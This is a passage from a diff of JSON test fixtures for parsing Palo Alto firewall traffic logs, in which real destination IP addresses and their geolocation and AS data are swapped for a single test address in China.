"175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 9007, - "ip": "100.24.131.237", + "ip": "175.16.199.1", "packets": 15 }, "rule": { @@ -6661,7 +6727,7 @@ "packets": 17, "ip": "192.168.15.224" }, - "message": "192.168.15.224,100.24.131.237,192.168.1.63,100.24.131.237,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6676,7 +6742,7 @@ "destination": { "nat": { "port": 443, - "ip": "100.24.131.237" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -6698,7 +6764,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:sXYelUOdA/EfjcKKE8M5kPe+M+c=" + "community_id": "1:BqGtjnqaLBL0AheKdX6R+tA//pM=" } }, "sequence_number": 32091152, @@ -6718,8 +6784,8 @@ ], "network": { "community_id": [ - "1:3G8yDLybfwtFo10J4I/c5Ayd4Qk=", - "1:sXYelUOdA/EfjcKKE8M5kPe+M+c=" + "1:i5utgkRZlpe6WaogEGc0X/ygshg=", + "1:BqGtjnqaLBL0AheKdX6R+tA//pM=" ], "transport": "tcp", "application": "ssl", @@ -6759,14 +6825,14 @@ ], "ip": [ "192.168.15.224", - "100.24.131.237", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 6000000000, - "ingested": "2021-09-08T12:40:05.941932038Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.131.237,192.168.1.63,100.24.131.237,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031651600Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -6789,27 +6855,29 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.252.247" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 661, - "ip": "184.51.252.247", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -6828,7 +6896,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -6843,7 +6911,7 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.252.247" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -6865,7 +6933,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:D6pPzYoIWTOXxVzuweKvZYK6FVE=" + "community_id": "1:HXFnYo3f5YlpCoWc0M/Gph6UNR0=" } }, "sequence_number": 32091153, @@ -6885,8 +6953,8 @@ ], "network": { "community_id": [ - "1:ZTCXYP/obCmlK+BT3BISstdxpCk=", - "1:D6pPzYoIWTOXxVzuweKvZYK6FVE=" + "1:QMGyI9PNy+dGmC37Ys8l8Zj1+2Q=", + "1:HXFnYo3f5YlpCoWc0M/Gph6UNR0=" ], "transport": "tcp", "application": "ssl", @@ -6926,14 +6994,14 @@ ], "ip": [ "192.168.15.224", - "184.51.252.247", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 13000000000, - "ingested": "2021-09-08T12:40:05.941935544Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031657100Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -6956,30 +7024,29 @@ "destination": { "nat": { "port": 443, - "ip": "35.190.88.148" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 11136, - "ip": "35.190.88.148", + "ip": "175.16.199.1", "packets": 16 }, "rule": { @@ -6998,7 +7065,7 @@ "packets": 15, "ip": "192.168.15.224" }, - "message": "192.168.15.224,35.190.88.148,192.168.1.63,35.190.88.148,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -7013,7 +7080,7 @@ "destination": { "nat": { "port": 443, - "ip": "35.190.88.148" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -7035,7 +7102,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:VFQjrA+iaNcIu6vFJNU6ls7+4Is=" + "community_id": "1:wIMtkc+omUcDuGtjtq8TvhqNq20=" } }, "sequence_number": 32091154, @@ -7055,8 +7122,8 @@ ], "network": { "community_id": [ - "1:DEAqTvDzZjanGG1P2CcnR3CKUfc=", - "1:VFQjrA+iaNcIu6vFJNU6ls7+4Is=" + "1:mrwNmKKDfyTNhQfx1zXczTdhcq4=", + "1:wIMtkc+omUcDuGtjtq8TvhqNq20=" ], "transport": "tcp", "application": "ssl", @@ -7096,14 +7163,14 @@ ], "ip": [ "192.168.15.224", - "35.190.88.148", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 8000000000, - "ingested": "2021-09-08T12:40:05.941939060Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.190.88.148,192.168.1.63,35.190.88.148,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031662500Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -7126,30 +7193,29 @@ "destination": { "nat": { "port": 443, - "ip": "35.186.243.83" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 11136, - "ip": "35.186.243.83", + "ip": "175.16.199.1", "packets": 16 }, "rule": { @@ -7168,7 +7234,7 @@ "packets": 15, "ip": "192.168.15.224" }, - "message": "192.168.15.224,35.186.243.83,192.168.1.63,35.186.243.83,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -7183,7 +7249,7 @@ "destination": { "nat": { "port": 443, - "ip": "35.186.243.83" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -7205,7 +7271,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:Xx31zYZNYc/mjf2GOihkp6JogmA=" + "community_id": "1:aKnE6fn7Ig7HrfpXAhg+xQzAzYs=" } }, "sequence_number": 32091155, @@ -7225,8 +7291,8 @@ ], "network": { "community_id": [ - "1:t/ErTuEXtgYIkRnq4+UdhVKcFnA=", - "1:Xx31zYZNYc/mjf2GOihkp6JogmA=" + "1:ODdDi5QbXC7LNnDH90Jp+12oB0Q=", + "1:aKnE6fn7Ig7HrfpXAhg+xQzAzYs=" ], "transport": "tcp", "application": "ssl", @@ -7266,14 +7332,14 @@ ], "ip": [ "192.168.15.224", - "35.186.243.83", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 8000000000, - "ingested": "2021-09-08T12:40:05.941942556Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.243.83,192.168.1.63,35.186.243.83,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031667800Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -7296,27 +7362,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 182, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -7335,7 +7403,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -7350,7 +7418,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -7372,7 +7440,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:445AeHI1LAvb+ii4arRZeLAO4zM=" + "community_id": "1:8KuHdx0uKJL3qlKce34DQ08Axak=" } }, "sequence_number": 32091156, @@ -7392,8 +7460,8 @@ ], "network": { "community_id": [ - "1:Y7iOj20be5Di4rx5iGHLO9k0YoU=", - "1:445AeHI1LAvb+ii4arRZeLAO4zM=" + "1:2lliaquecBpJntSuQ7PijiL4QZk=", + "1:8KuHdx0uKJL3qlKce34DQ08Axak=" ], "transport": "udp", "application": "dns", @@ -7433,14 +7501,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941946085Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031673100Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -7463,27 +7531,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 90, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -7502,7 +7572,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -7517,7 +7587,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -7539,7 +7609,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:+5KwsEYW+tFecEENSBwHbKTvUv8=" + "community_id": "1:QACuXO9c1p5aQqviOZwhIBygbzg=" } }, "sequence_number": 32091157, @@ -7559,8 +7629,8 @@ ], "network": { "community_id": [ - "1:8HlDMcJ2vfYtzQNW4/YDX7avDu8=", - "1:+5KwsEYW+tFecEENSBwHbKTvUv8=" + "1:2lDBZAbLgBaDEDnigTknsVKKmwI=", + "1:QACuXO9c1p5aQqviOZwhIBygbzg=" ], "transport": "udp", "application": "dns", @@ -7600,14 +7670,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941949603Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031678400Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -7630,30 +7700,29 @@ "destination": { "nat": { "port": 443, - "ip": "100.24.165.74" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 6669, - "ip": "100.24.165.74", + "ip": "175.16.199.1", "packets": 13 }, "rule": { @@ -7672,7 +7741,7 @@ "packets": 17, "ip": "192.168.15.224" }, - "message": "192.168.15.224,100.24.165.74,192.168.1.63,100.24.165.74,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -7687,7 +7756,7 @@ "destination": { "nat": { "port": 443, - "ip": "100.24.165.74" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -7709,7 +7778,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:DRqq/mx90TOYq1a5yLf562kwIvc=" + "community_id": "1:L1IS8Gq8v09nM/4oLFycf+iVo7Q=" } }, "sequence_number": 32091158, @@ -7729,8 +7798,8 @@ ], "network": { "community_id": [ - "1:dDqHJ1Y91GSM0iyiXXbBnOasVJM=", - "1:DRqq/mx90TOYq1a5yLf562kwIvc=" + "1:hLaHl+74+HjUILM+SmXuyrxDwdA=", + "1:L1IS8Gq8v09nM/4oLFycf+iVo7Q=" ], "transport": "tcp", "application": "ssl", @@ -7770,14 +7839,14 @@ ], "ip": [ "192.168.15.224", - "100.24.165.74", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 6000000000, - "ingested": "2021-09-08T12:40:05.941953158Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.165.74,192.168.1.63,100.24.165.74,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031683900Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -7800,27 +7869,29 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.252.247" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 661, - "ip": "184.51.252.247", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -7839,7 +7910,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": 